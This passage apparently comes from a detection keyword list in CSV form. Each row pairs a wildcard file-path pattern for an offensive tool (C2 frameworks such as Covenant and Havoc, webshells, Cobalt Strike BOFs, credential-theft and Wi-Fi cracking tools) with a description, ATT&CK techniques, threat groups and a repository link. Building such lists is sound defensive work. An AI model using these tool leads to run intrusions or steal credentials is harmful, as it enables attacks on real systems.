-*/weblistener.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*/weblogic-t3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/webshell.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/webshell/*.aspx*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z
-*/webshell/*.jsp*,offensive_tool_keyword,cobaltstrike,Bypass 
firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z
-*/webshell/*.php*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z
-*/webshells/shell.aspx*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*/webshells/shell.php*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*/WebSocketC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for 
command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z
-*/Weevely*,offensive_tool_keyword,weevely,weevely php web shell,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/sunge/Weevely,1,0,N/A,N/A,1,41,113,2012-04-19T18:00:08Z,2012-05-04T13:17:42Z
-*/Weevely3*,offensive_tool_keyword,Weevely3,Webponized web shell,T1100 - T1102 - T1059 - T1071 - T1056,TA0002 - TA0003,N/A,N/A,Web Attacks,https://github.com/epinna/weevely3,1,0,N/A,N/A,10,2908,607,2023-06-21T14:41:31Z,2014-09-20T10:16:49Z
-*/well_known_sids.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z
-*/WerTrigger.git*,offensive_tool_keyword,WerTrigger,Weaponizing for privileged file writes bugs with windows problem reporting,T1059.003 - T1055.001 - T1127.001 - T1546.008,TA0002 - TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/sailay1996/WerTrigger,1,1,N/A,9,2,147,34,2022-05-10T17:36:49Z,2020-05-20T11:27:56Z
-*/WfpTokenDup.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z
-*/whatlicense.git*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z
-*/WheresMyImplant/*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z
-*/WhoAmI.task*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z
-*/whois-domain.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/whois-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/Widgets/LootWidget.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z
-*/wifi_hopping.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z
-*/WiFiBroot*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z
-*/wifidump.c*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z
-*/wifite -c *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z
-*/wifite2*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. 
a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z
-*/wikipedia_fr.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z
-*/wikiZ/RedGuard*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z
-*/win/Tor/tor.exe*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - 
T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z
-*/Win7ElevateDll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/WinBruteLogon*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z
-*/win-brute-logon*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z
-*/windapsearch.git*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - 
TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z
-*/windapsearch_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*/windows/dcerpc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/windows_autologin.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/windows-login-phish*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z
-*/windows-lpe-template*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/windows-resources/hyperion*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/WindowsVault.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/WindowsVault.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/win-enum-resources*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/WinPwn*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwn.git*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwn_Repo*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwnage*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/winregistry.py**,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/winrm.cpp*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 